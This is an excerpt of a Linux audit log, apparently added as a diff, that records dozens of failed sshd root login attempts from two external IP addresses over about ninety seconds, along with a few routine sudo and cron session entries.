+type=CRED_DISP msg=audit(1551485410.555:27): pid=15671 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_AUTH msg=audit(1551485412.591:28): pid=15745 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485412.591:29): pid=15745 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485418.459:30): pid=16424 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485418.459:31): pid=16424 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485420.375:32): pid=16424 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485420.375:33): pid=16424 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485422.055:34): pid=16438 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485422.055:35): pid=16438 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485422.443:36): pid=16424 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485422.443:37): pid=16424 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485424.019:38): pid=16438 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485424.019:39): pid=16438 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485426.263:40): pid=16438 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485426.263:41): pid=16438 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485426.755:42): pid=16445 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485426.755:43): pid=16445 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485429.119:44): pid=16445 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485429.119:45): pid=16445 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485429.811:46): pid=16451 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485429.811:47): pid=16451 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485430.787:48): pid=16445 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485430.787:49): pid=16445 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485431.891:50): pid=16451 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485431.891:51): pid=16451 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485433.895:52): pid=16451 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485433.895:53): pid=16451 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485435.391:54): pid=16457 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485435.391:55): pid=16457 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485437.411:56): pid=16459 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485437.411:57): pid=16459 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485438.139:58): pid=16457 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485438.139:59): pid=16457 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485439.435:60): pid=16459 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485439.435:61): pid=16459 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485440.719:62): pid=16457 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485440.719:63): pid=16457 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485441.759:64): pid=16459 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485441.759:65): pid=16459 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485445.363:66): pid=16473 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485445.363:67): pid=16473 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485445.567:68): pid=16471 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485445.567:69): pid=16471 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485447.435:70): pid=16471 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485447.435:71): pid=16471 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485447.823:72): pid=16473 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485447.823:73): pid=16473 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485449.207:74): pid=16471 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485449.207:75): pid=16471 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485449.759:76): pid=16473 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485449.759:77): pid=16473 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485453.779:78): pid=16483 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485453.779:79): pid=16483 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485454.515:80): pid=16485 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485454.515:81): pid=16485 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485455.807:82): pid=16483 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485455.807:83): pid=16483 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485456.579:84): pid=16485 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485456.579:85): pid=16485 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485457.815:86): pid=16483 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485457.815:87): pid=16483 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485458.587:88): pid=16485 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485458.587:89): pid=16485 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551485461.319:90): pid=16500 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485461.319:91): pid=16500 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485461.319:92): pid=16500 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=242 res=1
+type=USER_START msg=audit(1551485461.323:93): pid=16500 uid=0 auid=0 ses=242 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551485461.323:94): pid=16500 uid=0 auid=0 ses=242 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485461.323:95): pid=16500 uid=0 auid=0 ses=242 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_AUTH msg=audit(1551485461.843:96): pid=16492 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485461.843:97): pid=16492 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485463.971:98): pid=16492 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485463.971:99): pid=16492 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485466.035:100): pid=16492 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485466.035:101): pid=16492 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485466.123:102): pid=16494 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485466.123:103): pid=16494 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485468.171:104): pid=16494 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485468.171:105): pid=16494 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485470.319:106): pid=16508 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485470.319:107): pid=16508 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485470.491:108): pid=16494 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485470.491:109): pid=16494 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485472.223:110): pid=16508 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485472.223:111): pid=16508 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485474.067:112): pid=16508 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485474.067:113): pid=16508 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485477.891:114): pid=16514 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485477.891:115): pid=16514 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485477.959:116): pid=16516 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485477.959:117): pid=16516 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485479.595:118): pid=16514 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485479.595:119): pid=16514 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485479.611:120): pid=16516 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485479.611:121): pid=16516 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485481.403:122): pid=16516 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485481.403:123): pid=16516 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485481.439:124): pid=16514 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485481.439:125): pid=16514 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485485.139:126): pid=16534 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485485.139:127): pid=16534 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485487.427:128): pid=16534 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485487.427:129): pid=16534 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485487.915:130): pid=16536 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485487.915:131): pid=16536 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485490.143:132): pid=16534 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485490.143:133): pid=16534 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485490.327:134): pid=16536 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485490.327:135): pid=16536 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485492.015:136): pid=16536 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485492.015:137): pid=16536 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485494.379:138): pid=16546 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485494.379:139): pid=16546 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485496.231:140): pid=16546 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485496.231:141): pid=16546 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485497.507:142): pid=16548 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485497.507:143): pid=16548 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485498.355:144): pid=16546 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485498.355:145): pid=16546 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485499.495:146): pid=16548 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485499.495:147): pid=16548 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485501.911:148): pid=16556 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485501.911:149): pid=16556 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485502.079:150): pid=16548 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485502.079:151): pid=16548 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
